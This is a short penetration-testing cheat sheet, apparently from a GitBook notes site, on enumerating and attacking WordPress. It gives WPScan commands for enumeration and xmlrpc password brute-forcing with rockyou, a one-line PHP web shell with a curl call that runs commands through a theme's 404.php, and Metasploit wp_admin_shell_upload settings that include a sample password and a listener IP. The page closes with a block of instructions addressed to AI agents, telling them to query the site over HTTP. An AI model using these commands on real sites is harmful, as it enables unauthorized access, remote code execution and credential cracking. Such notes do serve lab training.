# Wordpress

### Manual Enumeration

```bash
# Confirm that it is a wordpress site
curl -s <http://blog.sitet.local> | grep WordPress

# Check installede themes
curl -s <http://blog.site.local/> | grep themes

# Check for plugins installed
curl -s <http://blog.site.local/> | grep plugins
```

### WPScan

```bash
# Normal Scan 
sudo wpscan --url <http://blog.site.local> --enumerate --api-token dEOFB<SNIP>

# brute forcing with xmlrpc type
sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url <http://blog.site.local>
```

## Attacking Wordpress

### **Login Bruteforce**

```bash
# brute forcing with xmlrpc type
sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url <http://blog.site.local>
```

### **Code Execution**

```bash
# PHP web shell to upload on site
system($_GET[0]);

# using curl to execute commands
curl <http://site.local/wp-content/themes/twentynineteen/404.php?0=id>

# wp_admin_shell_upload can be used to upload a shell and execute it automatically
use exploit/unix/webapp/wp_admin_shell_upload
> set rhosts site.local
> set username john
> set password firebird1
> set lhost 10.10.14.15 
> set rhost 10.129.42.195  
> set VHOST blog.site.local
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://strange-1.gitbook.io/notes/common-applications/cms-content-management-system/wordpress.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.